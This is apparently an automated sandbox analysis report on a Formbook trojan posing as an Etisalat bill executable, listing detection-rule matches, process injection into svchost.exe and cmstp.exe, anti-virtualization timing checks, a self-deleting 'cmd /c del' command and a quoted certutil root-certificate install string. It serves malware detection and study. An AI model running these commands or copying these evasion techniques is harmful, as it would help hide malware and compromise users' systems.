          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Details of Your Etisalat Summary Bill for the Month of May 2024.exe PID: 5772, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 4428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmstp.exe PID: 1472, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@11/5
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCA2D5 GetLastError,FormatMessageW,0_2_00BCA2D5
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BB8713 AdjustTokenPrivileges,CloseHandle,0_2_00BB8713
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BB8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00BB8CC3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00AD8F05 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,InitiateSystemShutdownW,AdjustTokenPrivileges,CloseHandle,4_2_00AD8F05
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00BCB59E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BDF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00BDF121
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00BD86D0
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B64FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B64FE9
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeFile created: C:\Users\user\AppData\Local\Temp\autF8D9.tmpJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeCommand line argument: kernel32.dll4_2_00AD6052
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeReversingLabs: Detection: 36%
          Source: cmstp.exeString found in binary or memory: /k certutil.exe -f -enterprise -v -addstore Root "%s"
          Source: unknownProcess created: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic file information: File size 1062400 > 1048576
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: cmstp.pdbGCTL source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BDC304 LoadLibraryA,GetProcAddress,0_2_00BDC304
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B88B85 push ecx; ret 0_2_00B88B98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419196 push FFFFFF8Ah; ret 2_2_0041919C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EA01 push dword ptr [253FD125h]; ret 2_2_0041EB0F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4FB push eax; ret 2_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D55C push eax; ret 2_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300225F pushad ; ret 2_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030027FA pushad ; ret 2_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300283D push eax; iretd 2_2_03002858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300135E push eax; iretd 2_2_03001369
          Source: C:\Windows\explorer.exeCode function: 3_2_109629B5 push esp; retn 0000h3_2_10962AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10962B1E push esp; retn 0000h3_2_10962B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_10962B02 push esp; retn 0000h3_2_10962B03
          Source: C:\Windows\explorer.exeCode function: 3_2_10E099B5 push esp; retn 0000h3_2_10E09AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10E09B02 push esp; retn 0000h3_2_10E09B03
          Source: C:\Windows\explorer.exeCode function: 3_2_10E09B1E push esp; retn 0000h3_2_10E09B1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00AE1A3D push ecx; ret 4_2_00AE1A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D027FA pushad ; ret 4_2_04D027F9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D0225F pushad ; ret 4_2_04D027F9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D0283D push eax; iretd 4_2_04D02858
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04D309AD push ecx; mov dword ptr [esp], ecx4_2_04D309B6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E59196 push FFFFFF8Ah; ret 4_2_02E5919C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5D4F2 push eax; ret 4_2_02E5D4F8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5D4FB push eax; ret 4_2_02E5D562
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5D4A5 push eax; ret 4_2_02E5D4F8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5D55C push eax; ret 4_2_02E5D562
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5EA01 push dword ptr [253FD125h]; ret 4_2_02E5EB0F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02E5DEF2 push esp; iretd 4_2_02E5DEF9
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeFile created: \details of your etisalat summary bill for the month of may 2024.exe
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeFile created: \details of your etisalat summary bill for the month of may 2024.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADCAB4 GetSystemDirectoryW,memset,GetPrivateProfileStringW,RegOpenKeyExW,RegDeleteValueW,RegDeleteValueW,RegCloseKey,CmFree,4_2_00ADCAB4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00AD5DEC memset,GetPrivateProfileStringW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcAddress,GetProcAddress,FreeLibrary,4_2_00AD5DEC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADA6EE GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,LoadStringW,LoadStringW,lstrlenW,lstrlenW,lstrlenW,LoadStringW,LoadStringW,MessageBoxW,LoadStringW,GetSystemDirectoryW,LoadStringW,MessageBoxW,4_2_00ADA6EE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADB634 LoadStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileIntW,LoadStringW,MessageBoxW,CmFree,CmFree,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LoadStringW,MessageBoxW,memset,memset,memset,RegOpenKeyExW,RegQueryValueExW,ExpandEnvironmentStringsW,lstrcmpiW,LoadStringW,MessageBoxW,RegCloseKey,LoadStringW,RegCreateKeyW,lstrlenW,RegSetValueExW,LoadStringW,MessageBoxW,RegCloseKey,RegCloseKey,memset,memset,CopyFileW,LoadStringW,MessageBoxW,GetOSVersion,GetOSMajorVersion,CmMalloc,memset,CmFree,CmMalloc,memset,GetLastError,CmFree,lstrlenW,CmMalloc,lstrlenW,CmFree,CmFree,RegOpenKeyExW,RegDeleteValueW,RegCloseKey,LoadStringW,MessageBoxExW,CmMalloc,memset,CmFree,CmMalloc,4_2_00ADB634
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADD233 RegOpenKeyExW,GetPrivateProfileIntW,GetSystemDirectoryW,memset,GetPrivateProfileStringW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,memset,RegEnumValueW,RegCloseKey,4_2_00ADD233
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADDD1E memset,memset,memset,memset,LoadStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,RegCreateKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrlenW,memset,lstrlenW,lstrlenW,RegSetValueExW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,CmMalloc,CreateFileW,CloseHandle,CmFree,CmFree,GetPrivateProfileIntW,SetFileAttributesW,SHFileOperationW,RegCloseKey,RegCloseKey,4_2_00ADDD1E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADA068 memset,memset,RegOpenKeyExW,RegQueryValueExW,lstrcmpiW,LoadStringW,MessageBoxW,RegCloseKey,GetPrivateProfileIntW,GetPrivateProfileIntW,LoadStringW,LoadStringW,LoadStringW,MessageBoxW,GetSystemDirectoryW,4_2_00ADA068
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADA47F RegOpenKeyExW,RegQueryValueExW,GetPrivateProfileIntW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,4_2_00ADA47F
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B64A35
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BE55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00BE55FD
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00B833C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B833C7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 2E49904 second address: 2E4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 2E49B6E second address: 2E49B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3968Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5975Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeWindow / User API: threadDelayed 1800Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeWindow / User API: threadDelayed 8170Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100066
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeAPI coverage: 4.6 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\cmstp.exeAPI coverage: 1.2 %
          Source: C:\Windows\explorer.exe TID: 6008Thread sleep count: 3968 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6008Thread sleep time: -7936000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6008Thread sleep count: 5975 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6008Thread sleep time: -11950000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372Thread sleep count: 1800 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 4372Thread sleep time: -3600000s >= -30000sJump to behavior
